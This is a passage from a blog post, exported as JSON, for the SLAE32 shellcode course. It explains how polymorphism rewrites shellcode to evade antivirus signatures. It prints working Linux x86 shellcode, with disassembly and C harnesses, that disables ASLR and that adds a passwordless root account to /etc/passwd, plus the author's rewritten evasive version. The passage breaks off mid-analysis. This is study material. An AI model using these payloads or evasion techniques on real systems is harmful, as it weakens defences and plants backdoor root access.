{"id":286,"date":"2022-05-15T20:53:04","date_gmt":"2022-05-15T20:53:04","guid":{"rendered":"https:\/\/jacklgmcbride.co.uk\/blog\/?p=286"},"modified":"2023-10-06T10:30:14","modified_gmt":"2023-10-06T10:30:14","slug":"slae32-assignment-6-polymorphic-shellcode","status":"publish","type":"post","link":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/2022\/05\/15\/slae32-assignment-6-polymorphic-shellcode\/","title":{"rendered":"SLAE32 Assignment #6: Polymorphic Shellcode"},"content":{"rendered":"\n<p>In this blog post, we will be covering the concept of polymorphism, and how it can be used to modify shellcode to bypass antivirus signature detection.<\/p>\n\n\n\n<p>This post follows on in our blog series created for the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SLAE32<\/a> certification course provided by Pentester Academy.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p>Antivirus solutions tend to rely on two main detection mechanisms in order to identify malicious code. These are behavioural analysis, and signature detection. In signature detection, the AV engine tends to search shellcode for commonly known sequences of instructions, or 'patterns' which are known to be malicious. This makes it easy to fingerprint particular classes of malware with a simple pattern matching algorithm.<\/p>\n\n\n\n<p>A lot of the time, there is an emphasis on efficiency in shellcode. In general, this means that the smaller and more precisely a piece of shellcode carries out its intended action, the better. However, when it comes to comparing shellcode samples side by side, often many of them will look very similar at an instruction-by-instruction level.<\/p>\n\n\n\n<p>Taking Metasploit as an example, the well known 'shikata_ga_nai' encoder is known to be easily fingerprinted by most antivirus engines in use today, given its use of a commonly recognised decoder stub. 
This <a href=\"https:\/\/www.boozallen.com\/insights\/cyber\/shellcode\/shikata-ga-nai-encoder.html\">article<\/a> provides good coverage on how a simple Yara rule can be used to identify a sample of 236 payloads encoded using this particular encoder.<\/p>\n\n\n\n<p>This is where polymorphism comes in. The core idea behind polymorphism is to take a piece of shellcode and replace its instructions with others that perform equivalent functionality. The aim is to increase the level of obscurity and to break up byte patterns that are commonly shared between shellcode variants. Ultimately, the goal is for the shellcode to perform the same action but appear different at a signature level.<\/p>\n\n\n\n<p>In this blog post, we will be taking three shellcode examples from <a href=\"https:\/\/shell-storm.org\/shellcode\/\">ShellStorm<\/a> and applying this principle of polymorphism. Our chosen shellcodes are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shellcode 1: <a href=\"https:\/\/shell-storm.org\/shellcode\/files\/shellcode-813.php\">Linux\/x86 - ASLR deactivation - 83 bytes<\/a> <em>by Jean Pascal Pereira<\/em><\/li>\n\n\n\n<li>Shellcode 2: <a href=\"https:\/\/shell-storm.org\/shellcode\/files\/shellcode-211.php\">Linux\/x86 - add root user (r00t) with no password to \/etc\/passwd - 69 bytes<\/a> <em>by Kris Katterjohn<\/em><\/li>\n\n\n\n<li>Shellcode 3: <a href=\"https:\/\/shell-storm.org\/shellcode\/files\/shellcode-545.php\">Linux\/x86 - execve() of \/sbin\/iptables -F - 70 bytes<\/a> <em>by zillion<\/em><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 1: Linux\/x86 - ASLR deactivation<\/h2>\n\n\n\n<p>The first shellcode we will look at is said to deactivate ASLR. ASLR, or Address Space Layout Randomisation, was introduced to Linux in 2001 in order to randomise the memory segments of a given program. 
This means that any exploit which relies on static memory addresses would fail, as it would no longer be possible to determine in advance where the shellcode would end up in memory following exploitation.<\/p>\n\n\n\n<p>Modern Linux kernels enable this setting by default, with the value <strong>2<\/strong> in the file \/proc\/sys\/kernel\/randomize_va_space:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# cat \/proc\/sys\/kernel\/randomize_va_space                                                         1 \u2699\n2\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508114719.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>From this <a href=\"https:\/\/linux-audit.com\/linux-aslr-and-kernelrandomize_va_space-setting\/\">website<\/a> we understand that there are three main settings for ASLR:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0 \u2013 ASLR is disabled. Everything is static.<\/li>\n\n\n\n<li>1 \u2013 Address space randomisation. Shared libraries, stack, mmap(), VDSO and heap are randomised.<\/li>\n\n\n\n<li>2 \u2013 Complete randomisation. In addition to the randomisation in setting 1, memory managed through brk() is also randomised.<\/li>\n<\/ul>\n\n\n\n<p>We can temporarily disable ASLR by setting this value to 0. 
Next, we will analyse the shellcode sample to determine if this is what it actually does when executed.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm Analysis<\/h3>\n\n\n\n<p>The shellcode obtained from shell-storm is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/*\nTitle:  Linux x86 ASLR deactivation - 83 bytes\nAuthor: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;\nWeb:    http:\/\/0xffe4.org\n\nDisassembly of section .text:\n\n08048060 &lt;_start&gt;:\n 8048060:       31 c0                   xor    %eax,%eax\n 8048062:       50                      push   %eax\n 8048063:       68 70 61 63 65          push   $0x65636170\n 8048068:       68 76 61 5f 73          push   $0x735f6176\n 804806d:       68 69 7a 65 5f          push   $0x5f657a69\n 8048072:       68 6e 64 6f 6d          push   $0x6d6f646e\n 8048077:       68 6c 2f 72 61          push   $0x61722f6c\n 804807c:       68 65 72 6e 65          push   $0x656e7265\n 8048081:       68 79 73 2f 6b          push   $0x6b2f7379\n 8048086:       68 6f 63 2f 73          push   $0x732f636f\n 804808b:       68 2f 2f 70 72          push   $0x72702f2f\n 8048090:       89 e3                   mov    %esp,%ebx\n 8048092:       66 b9 bc 02             mov    $0x2bc,%cx\n 8048096:       b0 08                   mov    $0x8,%al\n 8048098:       cd 80                   int    $0x80\n 804809a:       89 c3                   mov    %eax,%ebx\n 804809c:       50                      push   %eax\n 804809d:       66 ba 30 3a             mov    $0x3a30,%dx\n 80480a1:       66 52                   push   %dx\n 80480a3:       89 e1                   mov    %esp,%ecx\n 80480a5:       31 d2                   xor    %edx,%edx\n 80480a7:       42                      inc    %edx\n 80480a8:       b0 04                   mov    $0x4,%al\n 80480aa:       cd 80                   int    
$0x80\n 80480ac:       b0 06                   mov    $0x6,%al\n 80480ae:       cd 80                   int    $0x80\n 80480b0:       40                      inc    %eax\n 80480b1:       cd 80                   int    $0x80\n\n*\/\n\n#include &lt;stdio.h&gt;\n#include &lt;string.h&gt;\n\nchar shellcode&#x5B;] = &quot;\\x31\\xc0\\x50\\x68\\x70\\x61\\x63\\x65\\x68\\x76\\x61\\x5f\\x73\\x68&quot;\n                   &quot;\\x69\\x7a\\x65\\x5f\\x68\\x6e\\x64\\x6f\\x6d\\x68\\x6c\\x2f\\x72\\x61&quot;\n                   &quot;\\x68\\x65\\x72\\x6e\\x65\\x68\\x79\\x73\\x2f\\x6b\\x68\\x6f\\x63\\x2f&quot;\n                   &quot;\\x73\\x68\\x2f\\x2f\\x70\\x72\\x89\\xe3\\x66\\xb9\\xbc\\x02\\xb0\\x08&quot;\n                   &quot;\\xcd\\x80\\x89\\xc3\\x50\\x66\\xba\\x30\\x3a\\x66\\x52\\x89\\xe1\\x31&quot;\n                   &quot;\\xd2\\x42\\xb0\\x04\\xcd\\x80\\xb0\\x06\\xcd\\x80\\x40\\xcd\\x80&quot;;\n\nint main()\n{\n  fprintf(stdout,&quot;Length: %zu\\n&quot;,strlen(shellcode));\n  (*(void  (*)()) shellcode)();\n}\n<\/pre><\/div>\n\n\n<p>To begin, we disassemble the shellcode using ndisasm.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\necho -ne &quot;\\x31\\xc0\\x50\\x68\\x70\\x61\\x63\\x65\\x68\\x76\\x61\\x5f\\x73\\x68\\x69\\x7a\\x65\\x5f\\x68\\x6e\\x64\\x6f\\x6d\\x68\\x6c\\x2f\\x72\\x61\\x68\\x65\\x72\\x6e\\x65\\x68\\x79\\x73\\x2f\\x6b\\x68\\x6f\\x63\\x2f\\x73\\x68\\x2f\\x2f\\x70\\x72\\x89\\xe3\\x66\\xb9\\xbc\\x02\\xb0\\x08\\xcd\\x80\\x89\\xc3\\x50\\x66\\xba\\x30\\x3a\\x66\\x52\\x89\\xe1\\x31\\xd2\\x42\\xb0\\x04\\xcd\\x80\\xb0\\x06\\xcd\\x80\\x40\\xcd\\x80&quot; | ndisasm -u -\n00000000  31C0              xor eax,eax\n00000002  50                push eax\n00000003  6870616365        push dword 0x65636170\n00000008  6876615F73        push dword 0x735f6176\n0000000D  68697A655F        push dword 0x5f657a69\n00000012  686E646F6D        push dword 0x6d6f646e\n00000017  686C2F7261        push dword 0x61722f6c\n0000001C  
6865726E65        push dword 0x656e7265\n00000021  6879732F6B        push dword 0x6b2f7379\n00000026  686F632F73        push dword 0x732f636f\n0000002B  682F2F7072        push dword 0x72702f2f\n00000030  89E3              mov ebx,esp\n00000032  66B9BC02          mov cx,0x2bc\n00000036  B008              mov al,0x8\n00000038  CD80              int 0x80\n0000003A  89C3              mov ebx,eax\n0000003C  50                push eax\n0000003D  66BA303A          mov dx,0x3a30\n00000041  6652              push dx\n00000043  89E1              mov ecx,esp\n00000045  31D2              xor edx,edx\n00000047  42                inc edx\n00000048  B004              mov al,0x4\n0000004A  CD80              int 0x80\n0000004C  B006              mov al,0x6\n0000004E  CD80              int 0x80\n00000050  40                inc eax\n00000051  CD80              int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">GDB Analysis<\/h3>\n\n\n\n<p>Now that we have obtained the raw assembly instructions, we next look at performing analysis in GDB.<\/p>\n\n\n\n<p>To begin, we take the shellcode buffer and insert it into our C skeleton program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \\\n&quot;\\x31\\xc0\\x50\\x68\\x70\\x61\\x63\\x65\\x68\\x76\\x61\\x5f\\x73\\x68\\x69\\x7a\\x65\\x5f\\x68\\x6e\\x64\\x6f\\x6d\\x68\\x6c\\x2f\\x72\\x61\\x68\\x65\\x72\\x6e\\x65\\x68\\x79\\x73\\x2f\\x6b\\x68\\x6f\\x63\\x2f\\x73\\x68\\x2f\\x2f\\x70\\x72\\x89\\xe3\\x66\\xb9\\xbc\\x02\\xb0\\x08\\xcd\\x80\\x89\\xc3\\x50\\x66\\xba\\x30\\x3a\\x66\\x52\\x89\\xe1\\x31\\xd2\\x42\\xb0\\x04\\xcd\\x80\\xb0\\x06\\xcd\\x80\\x40\\xcd\\x80&quot;;\n\nint main()\n{\n\n        printf(&quot;Shellcode Length:  %d\\n&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        
ret();\n\n}\n<\/pre><\/div>\n\n\n<p>We compile this with GCC:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>Then, we fire up GDB with the PEDA plugin enabled and set a breakpoint on the main function:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508120406.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We hit the breakpoint and disassemble the <strong>code<\/strong> variable containing the shellcode.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508120445.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then set a breakpoint on the first instruction and begin our analysis.<\/p>\n\n\n\n<p>We come to our first set of interesting instructions, which push several hex-encoded strings onto the stack.<\/p>\n\n\n\n<p>After the first PUSH instruction is executed, we inspect the stack and see the first string, \"pace\".<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508121456.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This appears to be the end of the file path '\/proc\/sys\/kernel\/randomize_va_space'.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508121555.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Iterating over the rest of the PUSH instructions, we construct the complete string, confirming the 
intention of the instructions is to push the file pathname to the stack for later use.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508121731.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the pathname is pushed to the stack, we see that a pointer to it (<strong>ESP<\/strong>) is moved into the <strong>EBX<\/strong> register. Next, the hex value <strong>0x2bc<\/strong> is moved into <strong>CX<\/strong> (the lower 16 bits of <strong>ECX<\/strong>), and <strong>0x8<\/strong> is moved into <strong>AL<\/strong>. Based on the syscall number, this indicates that a <strong>creat<\/strong> syscall is imminent.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508122130.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the function header for <strong>creat<\/strong>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint creat(const char *pathname, mode_t mode);\n<\/pre><\/div>\n\n\n<p>From our analysis above, we can deduce that the <strong>creat<\/strong> syscall is being used to open or create a file at the <strong>pathname<\/strong> '\/proc\/sys\/kernel\/randomize_va_space' with <strong>mode<\/strong> set to <strong>0x2bc<\/strong>, or <strong>700<\/strong> in decimal.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123120.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In this case, as <strong>700<\/strong> is chosen, this sets the user context in which the shellcode is running to have full read, write and execute permissions over the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508122435.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Once this file is open, its file descriptor (<strong>fd<\/strong>) is returned in <strong>EAX<\/strong>. The shellcode moves this value into the <strong>EBX<\/strong> register with the <strong>mov<\/strong> instruction, and pushes it to the stack. Next, the value <strong>0x3a30<\/strong> is moved into the <strong>DX<\/strong> register and pushed to the stack, before <strong>ESP<\/strong> is moved into <strong>ECX<\/strong> and <strong>EDX<\/strong> is cleared and then incremented to <strong>1<\/strong>. The value <strong>0x3a30<\/strong> is equivalent to the ASCII representation \"<strong>:0<\/strong>\".<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123045.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following this, the value <strong>0x4<\/strong> is moved into <strong>AL<\/strong>. 
Based on the syscall number, this indicates that a <strong>write<\/strong> syscall will be made.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123307.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the function header for <strong>write<\/strong>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nssize_t write(int fd, const void *buf, size_t count);\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123635.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following the syscall, the shellcode simply moves the value <strong>0x6<\/strong> into the <strong>AL<\/strong> register, which is the syscall number for <strong>close<\/strong>, and invokes it with <strong>int 0x80<\/strong>, closing the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123824.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We confirm the syscall for <strong>close<\/strong> as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123727.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Upon the file being successfully closed, <strong>close<\/strong> returns the value <strong>0x0<\/strong> in <strong>EAX<\/strong>. This means that the shellcode only has to increment <strong>EAX<\/strong>, setting it to <strong>0x1<\/strong>, the syscall number for <strong>exit<\/strong>. 
This will gracefully exit the shellcode.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508124038.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We check the \/proc\/sys\/kernel\/randomize_va_space file and confirm that it has been changed to contain '0', effectively disabling ASLR as intended.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508124121.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Shellcode 1: Polymorphic version<\/h3>\n\n\n\n<p>Before we make any changes to the assembly instructions, we create a copy of the original in a separate file as below. The original shellcode size is <strong>83 bytes<\/strong>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; Linux x86 ASLR deactivation - 83 bytes\n; Author: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;\n; Website: http:\/\/0xffe4.org\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        xor eax,eax \n        push eax \n        push dword 0x65636170\n        push dword 0x735f6176\n        push dword 0x5f657a69\n        push dword 0x6d6f646e\n        push dword 0x61722f6c\n        push dword 0x656e7265\n        push dword 0x6b2f7379\n        push dword 0x732f636f\n        push dword 0x72702f2f\n        mov ebx,esp \n        mov cx,0x2bc \n        mov al,0x8 \n        int 0x80 \n        mov ebx,eax \n        push eax \n        mov dx,0x3a30 \n        push dx \n        mov ecx,esp \n        xor edx,edx \n        inc edx \n        mov al,0x4 \n        int 0x80 \n        mov al,0x6 \n        int 0x80 \n        inc eax \n        int 
0x80\n<\/pre><\/div>\n\n\n<p>Our updated polymorphic version is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; disable_aslr_polymorphic.nasm - 71 bytes\n; Author: Jack McBride (PA-6483)\n; Website:  https:\/\/jacklgmcbride.co.uk\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        jmp _aslr\n\n_main:\n        xor eax, eax\n        pop ebx\n        mov cx,0x2bc \n        mov al,0x8 \n        int 0x80 \n        mov ebx,eax \n        push byte 0x30\n        mov ecx,esp \n        inc edx \n        mov al,0x4 \n        int 0x80 \n        mov al,0x6 \n        int 0x80 \n        inc eax \n        int 0x80\n\n_aslr:\n        call _main\n        db '\/proc\/sys\/kernel\/randomize_va_space'\n<\/pre><\/div>\n\n\n<p>Our <strong>polymorphic<\/strong> version is <strong>71 bytes<\/strong>, 12 bytes fewer than the original, a <strong>15.5% size decrease<\/strong>.<\/p>\n\n\n\n<p>In the original, the main standout feature is the 9 push instructions used to push the file path <strong>\/proc\/sys\/kernel\/randomize_va_space<\/strong> to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508150340.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Instead of using the stack technique, our polymorphic version uses the <strong>jmp-call-pop<\/strong> technique to pop the address of the pathname argument into the <strong>EBX<\/strong> register. 
This avoids the sequence of push instructions used by the original.<\/p>\n\n\n\n<p>Additionally, the buffer for the <strong>write<\/strong> syscall, originally the two bytes <strong>0x3a30<\/strong>, has been reduced to a single <strong>push byte 0x30<\/strong> instruction, as writing the value '0' into the randomize_va_space file was found to be sufficient.<\/p>\n\n\n\n<p>To save further space, the polymorphic version removes unnecessary instructions that cleared or incremented registers which were found to be unused.<\/p>\n\n\n\n<p>We run the new polymorphic shellcode and confirm that it works as expected. As with the original, this only succeeds when run as root, since \/proc\/sys\/kernel\/randomize_va_space is writable only by root:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508151431.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 2: Linux\/x86 - add root user (r00t) with no password to \/etc\/passwd<\/h2>\n\n\n\n<p>The next shellcode we will look at is said to add a passwordless local account with root permissions, under the name of 'r00t'. 
The functionality of this is quite self-explanatory so we will jump into performing our analysis with ndisasm.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm Analysis<\/h3>\n\n\n\n<p>The shellcode obtained from shell-storm is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/* By Kris Katterjohn 11\/14\/2006\n *\n * 69 byte shellcode to add root user 'r00t' with no password to \/etc\/passwd\n *\n * for Linux\/x86\n *\n *\n *\n * section .text\n *\n *      global _start\n *\n * _start:\n *\n * ; open(&quot;\/etc\/\/passwd&quot;, O_WRONLY | O_APPEND)\n *\n *      push byte 5\n *      pop eax\n *      xor ecx, ecx\n *      push ecx\n *      push 0x64777373\n *      push 0x61702f2f\n *      push 0x6374652f\n *      mov ebx, esp\n *      mov cx, 02001Q\n *      int 0x80\n *\n *      mov ebx, eax\n *\n * ; write(ebx, &quot;r00t::0:0:::&quot;, 12)\n *\n *      push byte 4\n *      pop eax\n *      xor edx, edx\n *      push edx\n *      push 0x3a3a3a30\n *      push 0x3a303a3a\n *      push 0x74303072\n *      mov ecx, esp\n *      push byte 12\n *      pop edx\n *      int 0x80\n *\n * ; close(ebx)\n *\n *      push byte 6\n *      pop eax\n *      int 0x80\n *\n * ; exit()\n *\n *      push byte 1\n *      pop eax\n *      int 0x80\n *\/\n\nmain()\n{\n       char shellcode&#x5B;] =\n               &quot;\\x6a\\x05\\x58\\x31\\xc9\\x51\\x68\\x73\\x73\\x77\\x64\\x68&quot;\n               &quot;\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x66&quot;\n               &quot;\\xb9\\x01\\x04\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x31\\xd2&quot;\n               &quot;\\x52\\x68\\x30\\x3a\\x3a\\x3a\\x68\\x3a\\x3a\\x30\\x3a\\x68&quot;\n               &quot;\\x72\\x30\\x30\\x74\\x89\\xe1\\x6a\\x0c\\x5a\\xcd\\x80\\x6a&quot;\n               &quot;\\x06\\x58\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n\n       (*(void (*)()) shellcode)();\n}\n--\n<\/pre><\/div>\n\n\n<p>To begin, we once again 
disassemble the shellcode using ndisasm:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\necho -ne &quot;\\x6a\\x05\\x58\\x31\\xc9\\x51\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x66\\xb9\\x01\\x04\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x31\\xd2\\x52\\x68\\x30\\x3a\\x3a\\x3a\\x68\\x3a\\x3a\\x30\\x3a\\x68\\x72\\x30\\x30\\x74\\x89\\xe1\\x6a\\x0c\\x5a\\xcd\\x80\\x6a\\x06\\x58\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot; | ndisasm -u -\n00000000  6A05              push byte +0x5\n00000002  58                pop eax\n00000003  31C9              xor ecx,ecx\n00000005  51                push ecx\n00000006  6873737764        push dword 0x64777373\n0000000B  682F2F7061        push dword 0x61702f2f\n00000010  682F657463        push dword 0x6374652f\n00000015  89E3              mov ebx,esp\n00000017  66B90104          mov cx,0x401\n0000001B  CD80              int 0x80\n0000001D  89C3              mov ebx,eax\n0000001F  6A04              push byte +0x4\n00000021  58                pop eax\n00000022  31D2              xor edx,edx\n00000024  52                push edx\n00000025  68303A3A3A        push dword 0x3a3a3a30\n0000002A  683A3A303A        push dword 0x3a303a3a\n0000002F  6872303074        push dword 0x74303072\n00000034  89E1              mov ecx,esp\n00000036  6A0C              push byte +0xc\n00000038  5A                pop edx\n00000039  CD80              int 0x80\n0000003B  6A06              push byte +0x6\n0000003D  58                pop eax\n0000003E  CD80              int 0x80\n00000040  6A01              push byte +0x1\n00000042  58                pop eax\n00000043  CD80              int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">GDB Analysis<\/h3>\n\n\n\n<p>Now that we have obtained the raw assembly instructions, we next look at performing analysis using 
GDB.<\/p>\n\n\n\n<p>To begin, we take the shellcode buffer and insert it into our C skeleton program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \\\n&quot;\\x6a\\x05\\x58\\x31\\xc9\\x51\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x66\\xb9\\x01\\x04\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x31\\xd2\\x52\\x68\\x30\\x3a\\x3a\\x3a\\x68\\x3a\\x3a\\x30\\x3a\\x68\\x72\\x30\\x30\\x74\\x89\\xe1\\x6a\\x0c\\x5a\\xcd\\x80\\x6a\\x06\\x58\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n\nint main()\n{\n\n        printf(&quot;Shellcode Length:  %d\\n&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>We compile it with GCC:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>We then start GDB and set two breakpoints: one on the <strong>main<\/strong> function, and the next at the first assembly instruction in the <strong>code<\/strong> variable as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509103141.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the initial instructions, we see that the string <strong>\/etc\/passwd<\/strong> is pushed in reverse to the stack:<\/p>\n\n\n\n<figure 